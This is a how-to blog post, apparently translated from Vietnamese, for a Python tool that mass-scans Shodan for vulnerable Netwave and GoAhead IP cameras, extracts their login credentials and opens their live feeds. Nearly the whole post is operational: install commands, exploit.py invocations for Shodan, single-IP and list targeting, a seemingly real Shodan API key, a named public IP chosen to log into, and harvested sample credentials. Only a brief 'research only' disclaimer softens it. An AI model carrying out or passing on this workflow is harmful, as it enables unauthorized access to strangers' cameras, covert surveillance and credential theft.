In the article “Exercise: Use ZoomEye to access the vulnerable Camera CVE-2018-9995“We can easily find many cameras that still have unpatched vulnerabilities. However, there is still a Tool called Netwave-GoAhead Exploit that helps to find another type of Vulnerable Security Camera.
Join the channel Telegram of the AnonyViet 👉 Link 👈 |
About Tools
This tool was created and developed by Kien Quoc. The tool has the main function of finding IP and checking 2 types of Cameras, Netware IP and GoAhead, to see if there are any vulnerabilities. From there hack into the camera and view the camera through your Browser.
Instructions on how to use Netwave-GoAhead Exploit
Note: the article is for research purposes only, it is strictly forbidden to use it for illegal purposes. In case the camera is found to be flawed, immediately notify the owner to quickly fix it.
Install tools
Step 1: Update your Linux and install Python 3 and Pip 3 for me
sudo apt update
sudo apt install Python3.9.6
(The latest version since the release of this article is 3.9.6. You can check it out on the Python homepage!)sudo apt-get update
sudo apt-get -y install python3-pip
Step 2: Install Netware-GoAhead Exploit tool
sudo git clone https://github.com/kienquoc102/Netwave-GoAhead-Exploits
Step 3: Go to the file and install the necessary packages
cd Netwave-GoAhead-Exploits
pip3 install -r ./related.txt
Register an account in Shodan.io
Shodan.io is a search engine that allows users to find specific types of computers connected to the internet using various filters. In this article, Shodan acts as an ip finder and filter for you to see which ip can be attacked.
Step 1: Go to Shodan.io here
Step 2: Select SIGN UP NOW
Step 3: Select Register in the upper corner
Step 4: Enter login information
Step 5: Go to email Verify with Shodan.io
Step 6: Go to account.shodan.io here.
Pay attention to the API key
Find Vulnerable Cameras with Shodan API key
Enter the following command
python3 exploit.py -b 2 -v --shodan [nhập cái API key của shodan vào đây]
My example would be
python3 exploit.py -b 2 -v --shodan rrgYhgIMtnrPtfKdiVvWKtyQyY94goA0
It will run as follows
The task you just need to wait for it to produce such results
Now I will try to log in to ip address 181.56.97.61 with port 80
It will prompt you to enter your username and password. Just based on what the tool says
An example of this would be
- Username: admin
- Password: 123456
Result
Sometimes you will encounter some cases like this
[+]The ip:192.168.120.1,port:81,username:Location: /admin (Example IP)
[+]The ip:192.168.120.1,port:81,password:<meta name="generator" content="vBulletin 5.5.4" />
For this ip, please help me remove it because it is not the IP Address of the Camera
Access Camera using available IP
With 1 IP address available port
You run yourself the following command
python3 exploit.py -b 1 -i [IP:PORT] -v
For example, I have
python3 exploit.py -b 1 -i 192.168.1.5:80 -v
Inside
IP address is 192.168.1.5
Port is 80
With IP list with port
You use the following command for yourself
python3 exploit.py -b 2 -l iplist.txt -v
Inside
iplist.txt is the file containing the ip address in the form: [IP:PORT]
Eg: 192.168.1.5:80
Target IP : 192.168.1.5
Port aimed at: 80
For this way, it will be easy to attack on an address that you already know or if you have an IPlist available, using the following way to check is a very effective way. Using Shodan is also possible but it will check for many strange ips that have been published on the network.
So I just finished the tutorial on how to find and attack the camera with the Python tool. If you have a good article, don’t hesitate to send an article contribution via email [email protected]
, we will edit and post it. See also: Exercise: Use ZoomEye to find vulnerable cameras CVE-2018-9995 here.